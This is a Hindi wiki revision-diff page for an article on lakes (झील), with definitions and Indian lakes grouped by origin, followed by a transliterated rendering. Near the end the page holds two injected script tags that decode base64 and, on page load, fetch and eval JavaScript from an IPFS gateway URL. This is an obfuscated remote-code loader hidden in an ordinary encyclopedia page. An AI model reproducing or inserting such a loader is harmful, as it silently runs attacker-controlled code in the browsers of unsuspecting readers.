Difference between revisions of "झील"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
झील [[जल]] का वह स्थिर भाग है जो चारों तरफ से स्थलखंडों से घिरा होता है। झील की दूसरी विशेषता उसका स्थायित्व है। सामान्य रूप से झील भूतल के वे विस्तृत गड्ढे हैं जिनमें जल भरा होता है।  
+
'''झील''' [[जल]] का वह स्थिर भाग है जो चारों तरफ से स्थलखंडों से घिरा होता है। झील की दूसरी विशेषता उसका स्थायित्व है। सामान्य रूप से झील भूतल के वे विस्तृत गड्ढे हैं जिनमें जल भरा होता है।  
 
*झीलों का जल प्रायः स्थिर होता है। झीलों की एक महत्त्वपूर्ण विशेषता उनका खारापन होता है लेकिन अनेक झीलें मीठे पानी की भी होती हैं।  
 
*झीलों का जल प्रायः स्थिर होता है। झीलों की एक महत्त्वपूर्ण विशेषता उनका खारापन होता है लेकिन अनेक झीलें मीठे पानी की भी होती हैं।  
 
*झीलें भूपटल के किसी भी भाग पर हो सकती हैं। ये उच्च [[पर्वत|पर्वतों]] पर मिलती हैं, [[पठार|पठारों]] और मैदानों पर भी मिलती हैं तथा स्थल पर [[सागर]] तल से नीचे भी पाई जाती हैं।
 
*झीलें भूपटल के किसी भी भाग पर हो सकती हैं। ये उच्च [[पर्वत|पर्वतों]] पर मिलती हैं, [[पठार|पठारों]] और मैदानों पर भी मिलती हैं तथा स्थल पर [[सागर]] तल से नीचे भी पाई जाती हैं।
*देखें- [[:Category:भारत की झीलें|भारत की झीलें]]
 
  
 +
==भारत की झीलें==
 +
देश की अधिकांश झीलों की स्थिति उत्तर के पर्वतीय पर्वतीय प्रदेश में ही सीमित है। समुद्र तटीय क्षेत्रों में भी कुछ महत्वपूर्ण झीलें स्थित हैं। मैदानी भाग में इनकी कमी है। देश में मिलने वाली विभिन्न प्रकार की झीलें निम्नलिखित हैं -
 +
#विवर्तनिक झीलें - [[कश्मीर]] की [[वूलर झील]] तथा [[कुमायूँ]] [[हिमालय]] में स्थित अनेक झीलें ।
 +
#ज्वालामुखी क्रिया से निर्मित झील - [[महाराष्ट्र]] के [[बुलढ़ाणा ज़िला|बुलढ़ाणा ज़िले]] की [[लोनार झील]]।
 +
#लैगून या अनूप झीलें - [[चिल्का झील]] ([[उड़ीसा]]), [[पुलिकट झील ]] ([[आंध्र प्रदेश]]), [[कोलेरू झील]] (आंध्र प्रदेश)
 +
#हिमानी द्वारा निर्मित झीलें - कुमायूँ हिमालय की अधिकांश झीलें इसी प्रकार की हैं। इनके उदाहरण हैं - राकसताल, [[नैनीताल झील|नैनीताल]], [[सात ताल झील|सातताल]], [[भीमताल झील|भीमताल]], [[नौकुचिया ताल]], खुरपाताल, समताल, पूनाताल, मालवाताल आदि।
 +
#वायु द्वारा निर्मित झीलें - [[राजस्थान]] की [[सांभर झील जयपुर|सांभर]], डीडवाना, पंचभद्रा, लूनकरनसर आदि।
 +
 +
====अन्य प्रमुख झीलें====
 +
[[डल झील]], मानसबल, शेषनाग, अनन्तनाग, गन्धारवल, अच्छाबल, बैरीनाग तथा नागिन झील ([[जम्मू-कश्मीर]]), उदयसागर, [[पिछोला झील|पिछोला]], [[फ़तह सागर झील|फ़तह सागर]], जयसमन्द, [[राजसमन्द झील|राजसमन्द]] ([[उदयपुर]]), [[लोकटक झील|लोकटक]] ([[मणिपुर]]), [[वेम्बानद झील|वेम्बानद]] ([[केरल]]), [[हुसैन सागर झील|हुसैनसागर]] (आन्ध्र प्रदेश) आदि।
 +
 
 
{{लेख प्रगति  
 
{{लेख प्रगति  
 
|आधार=  
 
|आधार=  

Revision as of 08:48, 22 April 2012

jhil jal ka vah sthir bhag hai jo charoan taraph se sthalakhandoan se ghira hota hai. jhil ki doosari visheshata usaka sthayitv hai. samany roop se jhil bhootal ke ve vistrit gaddhe haian jinamean jal bhara hota hai.

  • jhiloan ka jal prayah sthir hota hai. jhiloan ki ek mahattvapoorn visheshata unaka kharapan hota hai lekin anek jhilean mithe pani ki bhi hoti haian.
  • jhilean bhoopatal ke kisi bhi bhag par ho sakati haian. ye uchch parvatoan par milati haian, patharoan aur maidanoan par bhi milati haian tatha sthal par sagar tal se niche bhi paee jati haian.

bharat ki jhilean

desh ki adhikaansh jhiloan ki sthiti uttar ke parvatiy parvatiy pradesh mean hi simit hai. samudr tatiy kshetroan mean bhi kuchh mahatvapoorn jhilean sthit haian. maidani bhag mean inaki kami hai. desh mean milane vali vibhinn prakar ki jhilean nimnalikhit haian -

  1. vivartanik jhilean - kashmir ki voolar jhil tatha kumayooan himalay mean sthit anek jhilean .
  2. jvalamukhi kriya se nirmit jhil - maharashtr ke buladhana zile ki lonar jhil.
  3. laigoon ya anoop jhilean - chilka jhil (u disa), pulikat jhil (aandhr pradesh), koleroo jhil (aandhr pradesh)
  4. himani dvara nirmit jhilean - kumayooan himalay ki adhikaansh jhilean isi prakar ki haian. inake udaharan haian - rakasatal, nainital, satatal, bhimatal, naukuchiya tal, khurapatal, samatal, poonatal, malavatal adi.
  5. vayu dvara nirmit jhilean - rajasthan ki saanbhar, didavana, panchabhadra, loonakaranasar adi.

any pramukh jhilean

dal jhil, manasabal, sheshanag, anantanag, gandharaval, achchhabal, bairinag tatha nagin jhil (jammoo-kashmir), udayasagar, pichhola, fatah sagar, jayasamand, rajasamand (udayapur), lokatak (manipur), vembanad (keral), husainasagar (andhr pradesh) adi.  

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>